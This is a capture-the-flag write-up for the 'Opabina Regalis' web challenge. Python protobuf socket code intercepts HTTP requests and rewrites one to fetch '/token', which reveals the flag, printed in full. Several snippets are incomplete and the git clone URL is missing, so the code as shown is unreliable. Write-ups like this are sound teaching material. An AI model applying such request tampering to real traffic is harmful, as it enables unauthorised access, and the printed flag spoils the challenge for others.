Category: Web Points: 50 Solves: 79 Description:
There are a variety of client side machines that have access to certain websites we’d like to access. We have a system in place, called “Opabina Regalis” where we can intercept and modify HTTP requests on the fly. Can you implement some attacks to gain access to those websites?
Opabina Regalis makes use of Protocol Buffers to send a short snippet of the HTTP request for modification.
Here’s the protocol buffer definition used:
package main; message Exchange { enum VerbType { GET = 0; POST = 1; } message Header { required string key = 1; required string value = 2; } message Request { required VerbType ver = 1; // GET required string uri = 2; // /blah repeated Header headers = 3; // Accept-Encoding: blah optional bytes body = 4; } message Reply { required int32 status = 1; // 200 or 302 repeated Header headers = 2; optional bytes body = 3; } oneof type { Request request = 1; Reply reply = 2; } }
The network protocol uses a 32-bit little endian integer representing the length of the marshalled protocol buffer, followed by the marshalled protocol buffer.
Listening on port 1876 on
In order to solve this problem, I had to learn a little bit about Protocol buffer. I started by reading the documentation that was linked in the challenge description. It looks like Google supports a few different languages, so I decided to go with Python. But first I had to install the protocol buffer compiler (protoc).
Protocol Buffer Compiler Setup
Download the protocol buffer project
$ git clone
Compile and install (from Google’s Git Documentaion)
$ cd ./protobuf/
$ ./
$ ./configure
$ make
$ make check
$ sudo make install
$ sudo ldconfig # refresh shared library cache.
Google has provided the contents of our message file in the challenge description, simply save it as main.proto.
Now that the protocol buffer compiler has been installed and we have our main.proto file created, it is time to run the compiler.
$ protoc -I=./ --python_out=./ main.proto
Wow, I am finally ready to start writing code. I can create an empty Exchange message protocol buffer with the following snippet:
import main_pb2
msg = main_pb2.Exchange()
Client Code
Once I verified that I could import main_pb2, I setup the TCP/SSL socket as such:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
ws = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
This is the code I wrote for reading from the socket, careful to obey the requirement for 32bit little-endian integers.
def rx_msg(sock):
data = sock.recv(4)
#Unpack the message length
msg_len = struct.unpack('<I', data)[0]
data = sock.recv(msg_len)
#Read the protocol buffer message
msg = main_pb2.Exchange()
And the code for writing to the socket.
def tx_msg(sock, msg):
data = msg.SerializeToString()
p = struct.pack('<I', len(data)) + data
And add some simple code to print the request so that I can easily see what is happening.
def print_req(req):
print('VerbType: ' + repr(req.ver))
print('URI: ' + repr(req.uri))
for i in req.headers:
print('Body: ' + repr(req.body))
I should be all set, let’s connect to the socket and see if I get a request.
VerbType: 0
URI: u'/not-token'
key: "User-Agent"
value: "opabina-regalis.go"
Hmm… Looks like someone is trying to connect to ‘/not-token’. What if I create a new request for ‘/token’ instead.
new_dat = main_pb2.Exchange()
new_dat.request.ver = main_pb2.Exchange.GET
new_dat.request.uri = u'/token'
new_dat.request.body = ''
tx_msg(ws, new_dat)
Now let’s see what the whole script output looks like.
VerbType: 0
URI: u'/not-token'
key: "User-Agent"
value: "opabina-regalis.go"
Body: ''
Status: 200
key: "Server"
value: "opabina-regalis.go"
Body: 'CTF{WhyDidTheTomatoBlush...ItSawTheSaladDressing}'